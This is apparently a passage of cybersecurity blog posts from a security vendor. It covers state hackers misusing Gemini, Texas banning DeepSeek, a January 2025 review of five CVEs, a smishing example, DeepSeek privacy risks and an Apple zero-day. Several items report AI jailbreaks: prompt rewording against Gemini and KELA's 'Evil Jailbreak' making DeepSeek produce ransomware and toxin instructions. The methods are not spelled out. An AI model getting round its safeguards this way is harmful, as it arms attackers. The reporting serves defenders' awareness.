    • Russian APTs: Russian hackers have had limited engagement with Gemini, mainly using it for scripting assistance, translation, and malware development. Activities included rewriting malware in different programming languages, adding encryption to malicious code, and analyzing existing public malware. Their minimal use may indicate a preference for domestic AI models or an operational security decision to avoid Western AI platforms.

    Google notes that some APT actors attempted to circumvent Gemini’s security restrictions by using public jailbreak techniques or rewording their prompts. However, these attempts were reportedly unsuccessful.

    The misuse of generative AI by cybercriminals is not limited to Gemini. OpenAI previously disclosed similar activity involving ChatGPT in October 2024, indicating a broader trend of AI exploitation by threat actors.

    While major AI providers implement security measures to prevent abuse, the growing number of AI models with weak protections is a concern. Cybersecurity firm KELA recently highlighted security flaws in DeepSeek R1 and Alibaba’s Qwen 2.5, showing they are vulnerable to prompt injection attacks. Additionally, Unit 42 researchers demonstrated how easily DeepSeek R1 and V3 could be jailbroken for malicious use.

    As AI tools become more sophisticated, their misuse by threat actors is likely to expand. While Gemini and ChatGPT have security safeguards in place, the emergence of AI platforms with weak or nonexistent restrictions creates new challenges for cybersecurity defenders. Organizations must remain vigilant, implementing strict AI usage policies and monitoring for potential abuse by threat actors seeking to exploit these technologies for malicious purposes.


    Texas Bans DeepSeek and RedNote from Government Devices Over Security Concerns

    Texas Governor Greg Abbott has ordered a ban on Chinese AI platform DeepSeek and social media apps RedNote (Xiaohongshu) and Lemon8 from all state-issued devices, citing concerns over data security and potential foreign influence. Texas is the first state to impose such a restriction on DeepSeek, which has recently surged in popularity among U.S. users.

    In a statement, Abbott emphasized the state’s commitment to protecting critical infrastructure from foreign threats. “Texas will not allow the Chinese Communist Party to infiltrate our state’s critical infrastructure through data-harvesting AI and social media apps,” he said. “Texas will continue to protect and defend our state from hostile foreign actors.”

    The governor’s office declined to provide further details on the decision.

    DeepSeek, a rapidly growing AI startup, has gained attention for its ability to rival OpenAI’s models. Meanwhile, RedNote (Xiaohongshu) and Lemon8, both owned by Chinese companies, have seen increased adoption in the U.S., particularly after the brief ban on TikTok. Xiaohongshu, widely used in China and neighboring countries, has around 300 million active users and was adopted by many Americans as a TikTok alternative and protest tool against restrictions on the popular video-sharing app.

    Lemon8, owned by ByteDance—the same company behind TikTok—also gained traction leading up to TikTok’s temporary ban on January 19.

    Texas’ move follows broader efforts at both the state and federal levels to restrict access to Chinese-owned platforms on government devices. TikTok has already been banned on government-issued devices in Texas and multiple other states, and its future remains uncertain as ByteDance navigates ongoing U.S. regulatory scrutiny.


    How Can Netizen Help?

    Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time. 

    We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. 

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

    Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans. 


  • Netizen: January 2025 Vulnerability Review

    Security vulnerabilities are a common occurrence in managing any business’s organizational security. The prompt patching and remediation of any new vulnerabilities are critical to reducing the outside attack surface. Netizen’s Security Operations Center (SOC) has compiled five critical vulnerabilities from December that should be immediately patched or addressed if present in your environment. Detailed writeups below:


    CVE-2025-21366

    CVE-2025-21366 is a high-severity remote code execution (RCE) vulnerability affecting Microsoft Access. This flaw, disclosed in Microsoft’s January 2025 Patch Tuesday, poses a significant risk as it could allow an attacker to execute arbitrary code on a targeted system.

    The vulnerability is rated with a CVSS v3 base score of 7.8, indicating a serious threat, particularly in environments where Microsoft Access is widely used for database management. Exploitation of CVE-2025-21366 requires user interaction, meaning an attacker would likely need to convince a user to open a malicious file or perform an action that triggers the vulnerability. Once exploited, the attacker could gain high privileges on the affected system, leading to potential data compromise, unauthorized system modifications, or further exploitation of the network.

    Microsoft has released a security update to address CVE-2025-21366, and organizations are strongly advised to apply the patch as soon as possible to mitigate the risk. Given the potential for exploitation and the widespread use of Microsoft Access in enterprise environments, timely remediation is crucial to prevent security breaches.


    CVE-2025-21333

    CVE-2025-21333 is a high-severity elevation of privilege vulnerability affecting Windows Hyper-V’s NT Kernel Integration VSP. This flaw, disclosed as part of Microsoft’s January 2025 Patch Tuesday, is particularly concerning as it could allow an attacker to escalate privileges within a virtualized environment, potentially compromising the host system.

    With a total of 157 vulnerabilities addressed in this patch cycle—the largest ever for a Microsoft Patch Tuesday—CVE-2025-21333 stands out due to its impact on virtualized infrastructures. The vulnerability exists in Hyper-V’s integration services, which facilitate communication between guest virtual machines and the host operating system. If exploited, an attacker with limited access to a virtual machine could leverage this flaw to execute code with elevated privileges, potentially affecting other virtual machines or the underlying Hyper-V host.

    Organizations relying on Hyper-V for virtualization should prioritize applying this patch to prevent potential privilege escalation attacks that could compromise their cloud or on-premises virtual environments. Given the critical nature of this vulnerability and its potential to be chained with other exploits, timely remediation is strongly recommended.


    CVE-2025-0282

    CVE-2025-0282 is a critical stack-based buffer overflow vulnerability affecting Ivanti Connect Secure, Policy Secure, and Neurons for ZTA gateways. The flaw, present in Ivanti Connect Secure before version 22.7R2.5, Policy Secure before version 22.7R1.2, and Neurons for ZTA gateways before version 22.7R2.3, allows a remote unauthenticated attacker to achieve remote code execution (RCE).

    Ivanti disclosed this vulnerability alongside another related flaw, revealing that CVE-2025-0282 had already been actively exploited as a zero-day before the official disclosure. This means that attackers were leveraging the vulnerability in real-world attacks before security patches were available. The flaw enables attackers to execute arbitrary code on vulnerable systems, potentially leading to full system compromise, data exfiltration, and further network infiltration.

    Given its critical severity and the fact that exploitation has been observed in the wild, organizations using affected Ivanti products should prioritize immediate patching. Delays in remediation could leave enterprises at significant risk, especially considering that high-profile targets, such as national infrastructure and enterprises, have already been affected. Security researchers have warned that many Ivanti VPNs remain unpatched despite the availability of fixes, further increasing the urgency for administrators to deploy the necessary updates as soon as possible.


    CVE-2025-21275

    CVE-2025-21275 is a high-severity elevation of privilege vulnerability affecting the Windows App Package Installer. This flaw allows attackers with local access to escalate their privileges, potentially gaining control over a system. Exploiting this vulnerability does not require user interaction but does require prior access to the machine with limited privileges.

    The vulnerability was disclosed as part of Microsoft’s January 2025 Patch Tuesday, which addressed a total of 157 CVEs. Given the nature of privilege escalation vulnerabilities, CVE-2025-21275 could be exploited as part of a larger attack chain, allowing adversaries to gain higher-level access on compromised systems.

    Organizations and individual users should apply the security updates released by Microsoft as soon as possible to mitigate the risk. Delaying patching could leave systems vulnerable to attacks leveraging this flaw to gain unauthorized access and execute malicious actions with elevated privileges.


    CVE-2025-21307

    CVE-2025-21307 is a critical remote code execution vulnerability affecting the Windows Reliable Multicast Transport Driver (RMCAST). This flaw, with a CVSS v3 base score of 9.8, allows unauthenticated attackers to execute arbitrary code remotely without requiring user interaction. Due to its low attack complexity and high impact on confidentiality, integrity, and availability, this vulnerability poses a significant risk to affected systems.

    Microsoft disclosed the issue as part of the January 2025 Patch Tuesday security updates, urging organizations to apply the necessary patches immediately. Given its critical severity, threat actors could exploit CVE-2025-21307 to deploy malware, disrupt services, or gain unauthorized access to networks.

    Users and administrators should prioritize patching systems running vulnerable versions of Windows to mitigate potential exploitation. Unpatched systems remain highly susceptible to remote attacks, which could lead to full system compromise.


    How Can Netizen Help?

    Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time. 

    We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. 

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

    Netizen is an ISO 27001:2013 (Information Security Management), ISO 9001:2015, and CMMI V 2.0 Level 3 certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans. 

    Questions or concerns? Feel free to reach out to us any time –

    https://www.netizen.net/contact


  • Netizen Cybersecurity Bulletin (January 30th, 2025)

    Overview:

    • Phish Tale of the Week
    • Is DeepSeek Safe to Use? A Dive into Privacy and Security Concerns
    • Apple Fixes First Actively Exploited iOS Zero-Day of 2025
    • How can Netizen help?

    Phish Tale of the Week

    Often times phishing campaigns, created by malicious actors, target users by utilizing social engineering. For example, in this email, the actors are appearing as an unnamed company. They’re sending us a text message, asking us if we’re looking for a remote job, and that it’s imperative that we click the link below. It seems both urgent and genuine, so why shouldn’t we? Luckily, there’s plenty of reasons that point to this being a scam.

    Here’s how we can tell not to fall for this phish:

    1. The first warning sign for this SMS is the context in which it was sent. When I recieved this SMS, I immediately knew not to click on the link due to the fact that I did not recently inquire anywhere about any remote work; Real companies looking to recruit qualified employees would not reach out to numbers in this way. On top of that, it’s very apparent that this message was blasted out to random numbers: the message doesn’t even include my name or attempt to provide any level of familiarity that would convince me to click on their fake WhatsApp link.
    2. The second warning signs in this email is the messaging. This message tries to create a sense of opportunity and urgency in order to get you to take action by using language such as “You only need to invest 20 minutes a day.” Phishing and smishing scams commonly attempt to create a sense of urgency/confusion in their messages in order to get you to click their link without thinking about it first. Always be sure to thoroughly inspect the style and tone of all texts before following a link or other attachment sent through SMS.
    3. The final warning sign for this email is the wording. The grammar is strange and unprofessional, a real job offer or recruiter would not send out an SMS blast to several people like this. All of these factors point to the above being a smishing text, and a very unsophisticated one at that.


    General Recommendations:

    phishing attack will typically direct the user to click on a link where they will then be prompted to update personal information, such as a password, credit card, social security, or bank account information. A legitimate company already has this sensitive information and would not ask for it again, especially via your text messages. 

    1. Scrutinize your messages before clicking anything. Have you ordered anything recently? Does this order number match the one I already have? Did the message come from a store you don’t usually order supplies from or a service you don’t use? If so, it’s probably a phishing attempt.
    2. Verify that the sender is actually from the company sending the message.
    3. Did you receive a message from someone you don’t recognize? Are they asking you to sign into a website to give Personally Identifiable Information (PII) such as credit card numbers, social security number, etc. A legitimate company will never ask for PII via instant message or email.
    4. Do not give out personal or company information over the internet.
    5. Do not click on unrecognized links or attachments. If you do proceed, verify that the URL is the correct one for the company/service and it has the proper security in place, such as HTTPS.

    Many phishing messages pose a sense of urgency or even aggressiveness to prompt a form of intimidation. Any email requesting immediate action should be vetted thoroughly to determine whether or not it is a scam. Also, beware of messages that seek to tempt users into opening an attachment or visiting a link. For example, an attachment titled “Fix your account now” may draw the question “What is wrong with my account?” and prompt you to click a suspicious link.


    Cybersecurity Brief

    In this month’s Cybersecurity Brief:

    Is DeepSeek Safe to Use? A Dive into Privacy and Security Concerns

    DeepSeek AI has taken the tech world by storm, rising to the top of app store rankings and positioning itself as a strong competitor to OpenAi’s ChatGPT. However, despite its rapid success, the Chinese AI platform has raised serious privacy and security concerns—issues that even traditional privacy tools like VPNs may not fully protect against.

    DeepSeek was barely a week into its public release when it suffered a large-scale cyberattack, forcing the platform to limit new user registrations. While existing users could still log in, the attack disrupted services, and DeepSeek acknowledged ongoing performance issues on its status page.

    Although the company has not disclosed specific details about the attack, cybersecurity experts suspect it was a distributed denial-of-service (DDoS) attack, which overwhelms a system with excessive traffic, causing it to crash. This incident raises critical questions about DeepSeek’s security infrastructure and its ability to protect user data.

    Beyond cybersecurity threats, DeepSeek’s privacy policy has sparked significant concerns regarding how the platform collects, stores, and shares user data. Here are some key takeaways:

    DeepSeek requires users to sign in via Google, granting the platform access to personal information, including:

    • Full name
    • Email address
    • Profile picture (if available)

    While this may seem standard, the policy states that DeepSeek may also collect additional information from third-party services, potentially exposing more user data than anticipated.

    DeepSeek not only collects data on its own platform but also tracks user activity across other websites and services. The platform’s advertising and analytics partners share information about user actions outside of DeepSeek, including:

    • Websites visited
    • Products purchased
    • Online interactions

    Even if DeepSeek claims to “anonymize” data, this level of tracking significantly compromises user privacy.

    One of the most alarming discoveries in DeepSeek’s privacy policy is its collection of keystroke patterns and rhythms. This means the AI tool is capable of:

    • Logging every key you press
    • Monitoring how long you press each key
    • Recording the speed and pattern of your typing

    This level of tracking is highly invasive, as keystroke logging can reveal sensitive information such as passwords and private conversations. Worse still, DeepSeek does not clearly state how long this data is stored or whether it can ever be fully deleted.

    DeepSeek states it retains user data for as long as necessary, but it does not define a specific timeframe. This vague policy means that your personal information could be stored indefinitely, leaving it vulnerable to potential misuse or unauthorized access.

    DeepSeek’s data is stored on servers located in China, raising additional concerns about how user information is managed and whether it is subject to government surveillance. The terms of service confirm that the platform is governed by Chinese laws, meaning any collected data could potentially be accessed by state authorities.

    DeepSeek’s vulnerabilities extend beyond privacy concerns. Cybersecurity researchers at KELA have successfully jailbroken DeepSeek’s AI model, proving that it can be manipulated to:

    • Generate ransomware
    • Provide instructions for creating toxins
    • Fabricate sensitive content

    The “Evil Jailbreak” exploit, which bypasses AI safety mechanisms, was previously patched in ChatGPT 3.5—but DeepSeek remains vulnerable.

    KELA’s findings highlight how easily the AI model can be exploited, making it a potential tool for cybercriminals. This is particularly concerning given that AI-driven malware development, phishing scams, and fraud are already on the rise.

    DeepSeek’s ties to China’s legal and cybersecurity frameworks have sparked comparisons to TikTok, which has faced scrutiny over its data-sharing policies. The Chinese government has extensive control over internet regulations, meaning that DeepSeek’s collected data could be subject to state oversight.

    Users have also reported that DeepSeek censors politically sensitive topics, such as Tiananmen Square and Taiwan, further fueling concerns about government influence.

    While DeepSeek’s AI capabilities may be impressive, its security flaws, invasive tracking, and questionable data policies make it a high-risk platform for privacy-conscious users. Here’s why you might want to reconsider:

    • Cyberattacks have already disrupted the platform—indicating weak security measures.
    • User data is extensively tracked and shared, including across third-party sites.
    • Keystroke logging poses a major privacy threat, with no clear data retention policy.
    • Chinese government regulations may compromise data security and transparency.

    Unless DeepSeek addresses its security vulnerabilities and clarifies its data policies, users should approach this AI tool with extreme caution.

    If protecting your personal information, browsing habits, and online security is a priority, DeepSeek is best avoided—at least until significant improvements are made.

    To read more about this article, click here.


    Apple Fixes First Actively Exploited iOS Zero-Day of 2025

    Apple has released security updates addressing multiple vulnerabilities across its mobile and desktop platforms, including a zero-day flaw actively exploited in iOS attacks.

    One of the most critical fixes in this update targets CVE-2025-24085, a use-after-free vulnerability in the CoreMedia component. According to Apple’s advisory, this flaw could allow malicious applications to escalate privileges, potentially giving attackers unauthorized access to sensitive data and system resources.

    Apple confirmed that the vulnerability has been exploited in the wild against versions of iOS prior to iOS 17.2 but did not disclose specific details regarding the nature of these attacks. The issue was addressed through improved memory management.

    Alongside iOS and iPadOS updates, Apple rolled out patches for macOS Sequoia, tvOS, visionOS, and watchOS, all of which were impacted by CVE-2025-24085. However, there is no evidence that this vulnerability has been exploited on platforms other than iOS.

    The latest security updates include:

    • iOS 18.3 and iPadOS 18.3, which fix 29 vulnerabilities, including issues related to authentication bypass, arbitrary code execution, privilege escalation, spoofing, and command injection.
    • macOS Sequoia 15.3, which patches over 60 vulnerabilities addressing similar security concerns.
    • macOS Sonoma 14.7.3 and macOS Ventura 13.7.3, which fix over 40 and 30 security flaws, respectively.
    • tvOS 18.3, watchOS 11.3, and visionOS 2.3, which contain security updates addressing between 17 and 21 vulnerabilities.
    • Safari 18.3, which includes fixes for seven browser vulnerabilities, including authentication bypass, user interface spoofing, denial-of-service (DoS), and command injection risks.

    According to Sylvain Cortes, VP at Hackuity, attackers could exploit the CoreMedia flaw using a malicious app disguised as a media player, granting them access to sensitive data and potentially leading to unauthorized data access, financial loss, and privacy breaches.

    Apple users are strongly advised to update their devices immediately to protect against these security threats. For more details, visit Apple’s security updates page.

    To read more about this article, click here.


    How Can Netizen Help?

    Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time. 

    We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. 

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

    Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans.